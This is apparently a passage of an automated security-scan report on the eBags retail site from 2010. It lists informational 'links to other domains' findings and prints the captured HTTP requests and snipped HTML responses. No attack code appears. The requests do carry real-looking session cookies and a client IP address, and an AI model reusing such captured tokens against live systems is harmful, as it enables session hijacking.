Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:18:55 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:18:55 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 44114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<td bgcolor="#cccccc"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="1"></td>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0" hspace="10"></a>
...[SNIP]...
<!-- BEGIN: BizRate Medal (125x73 pixels) -->
<a href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--18522.html" target="http://www.bizrate.com">
<img src="http://medals.bizrate.com/medals/dynamic/18522_medal.gif" alt="BizRate Customer Certified (GOLD) Site" width="125" height="73" align="top" border="0" target="_blank"></a>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

4.11. http://www.ebags.com/members/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /members/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /members/index.cfm?fuseaction=welcome HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:02:57 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 14:02:57 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 45848


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<P>
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="20" height="10" align="left">
<table width="650" border="0" cellpadding="0">
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

4.12. http://www.ebags.com/product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617?productid=1283460 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/category/travel-accessories/20014443?ne=100
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; mbox=session#1293371743230-938821#1293373836|PC#1293371743230-938821.20#1294581576|check#true#1293372036; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822PRODUCTID=","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":5,"to":5,"c":"http://www.ebags.com/shoppingcart/index.cfm","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1293371974968}; s_cc=true; __cmbDomTm=0; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbTpvTm=1150; fsr.a=1293371979601; s_sq=ebagsprod%3D%2526pid%253DCategory%252520%25253A%252520Sale%252520%25253A%252520Travel%252520Accessories%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ebags.com%25252Fproduct%25252Fbaggallini%25252Fa-la-carte-bagg-medium-crinkle-nylon%25252F107617%25253Fproductid%25253D128346%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:59:59 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:59:59 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 87104


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<a href="/"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-home.png"></a>
...[SNIP]...
<a id="lnkZoomIcon" href="/products/view/ZoomColorsViews.cfm?fuseaction=imagePop&amp;ModelID=107617&amp;ipsid=107617_7_1" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-clicktozoom.gif" border="0" /></a>
...[SNIP]...
<a href="/products/view/ZoomColorsViews.cfm?fuseaction=imagePop&amp;ModelID=107617&amp;ipsid=107617_7_1" target="_blank"
><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_7_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=280&wid=280" height="280" width="280" data-ipsid="107617_7_1" border="0" /></a>
</div>
<div class="md-pad10">
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_1_2?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="107617_1_2" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_1_3?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="107617_1_3" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_1_4?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="107617_1_4" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_1_5?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="107617_1_5" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_1_6?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="107617_1_6" />
</div>
...[SNIP]...
<a href="/brand/baggallini"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logos/logo_376.gif" /></a>
...[SNIP]...
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_10_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="baggallini A La Carte Bagg - Medium - Crinkle Nylon Steel Blue/Leaf Green" height="55" width="55" class="iconImage skuImage" data-ipsid="107617_10_1" data-skuid="1283458"></div>
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_4_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="baggallini A La Carte Bagg - Medium - Crinkle Nylon Khaki/Black" height="55" width="55" class="iconImage skuImage" data-ipsid="107617_4_1" data-skuid="1283455"></div>
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_13_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="baggallini A La Carte Bagg - Medium - Crinkle Nylon Navy/Leaf Green" height="55" width="55" class="iconImage skuImage" data-ipsid="107617_13_1" data-skuid="10001422"></div>
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_11_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="baggallini A La Carte Bagg - Medium - Crinkle Nylon Mushroom/Caspian Blue" height="55" width="55" class="iconImage skuImage" data-ipsid="107617_11_1" data-skuid="1330155"></div>
<div class="productThumb productThumb_select"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_7_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="baggallini A La Carte Bagg - Medium - Crinkle Nylon Tomato/Mango" height="55" width="55" class="iconImage skuImage" data-ipsid="107617_7_1" data-skuid="1283460"></div>
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_1_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="baggallini A La Carte Bagg - Medium - Crinkle Nylon Black/Khaki" height="55" width="55" class="iconImage skuImage" data-ipsid="107617_1_1" data-skuid="1283452"></div>
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_2_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="baggallini A La Carte Bagg - Medium - Crinkle Nylon Dark Olive/Spice" height="55" width="55" class="iconImage skuImage" data-ipsid="107617_2_1" data-skuid="1283453"></div>
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_3_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="baggallini A La Carte Bagg - Medium - Crinkle Nylon Espresso/Tomato" height="55" width="55" class="iconImage skuImage" data-ipsid="107617_3_1" data-skuid="1283454"></div>
...[SNIP]...
<div class="icon-sendtoafriend"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-sendtoafriend.gif" alt="Send to a Friend" /></div>
...[SNIP]...
<br />
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.ebags.com%2fproduct%2fbaggallini%2fa-la-carte-bagg-medium-crinkle-nylon%2f107617&amp;layout=standard&amp;show_faces=true&amp;width=340&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:340px; height:25px;" allowTransparency="true"></iframe>
...[SNIP]...
<a href="#" onclick="javascript:openSesame('/info/index.cfm?FuseAction=BOTB','Info','no','300','250','no','no','no','111','111'); return false;"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-botb.gif" /></a>
...[SNIP]...
</script>
<a id="_lpChatBtn" href='https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262'
target='chat16136262' onclick="javascript:window.open('https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262&referrer='+escape(document.location),'chat16136262','width=475,height=400,resizable=yes');return false;">

<span class="help-icon">
...[SNIP]...
<div id="lp-Ebags-WorldClassService-div">
<img src='http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/reponline.gif' name='' border="0" /></div>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpPhone.png" width="70"
height="47" border="0" alt="Call Us 24/7" />
</span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpEmail.png" width="70"
height="50" border="0" alt="Email" />
</span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpFAQ.png" width="70" height="56"
border="0" alt="FAQ'S" />
</span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpSuggest.png" width="70"
height="53" border="0" alt="Have a Suggestion?" />
</span>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<a href="/info/ratings/index.cfm?fuseaction=enter&modelid=107617&testimonial_link=write_your_own"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-writeownreview.gif" /></a>
...[SNIP]...
<a href="#"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-backtotop.gif" width="96" height="22" alt="Back to top" /></a>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.productDetail.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/jquery.validate.min.js'></script>
...[SNIP]...

4.13. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /product/case-logic/sony-psp-game-case/120830

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

